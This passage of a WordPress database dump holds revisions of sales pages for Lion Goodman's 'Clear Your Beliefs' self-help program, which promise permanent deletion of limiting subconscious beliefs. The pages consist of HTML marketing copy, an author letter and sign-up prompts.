practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-14 19:48:25', '2014-12-15 00:48:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(2056, 2, '2014-12-14 19:52:42', '2014-12-15 00:52:42', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 32px"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -4px;padding:0 5px">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-12-14 19:52:42', '2014-12-15 00:52:42', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2058, 2, '2014-12-14 21:46:39', '2014-12-15 02:46:39', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain’s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 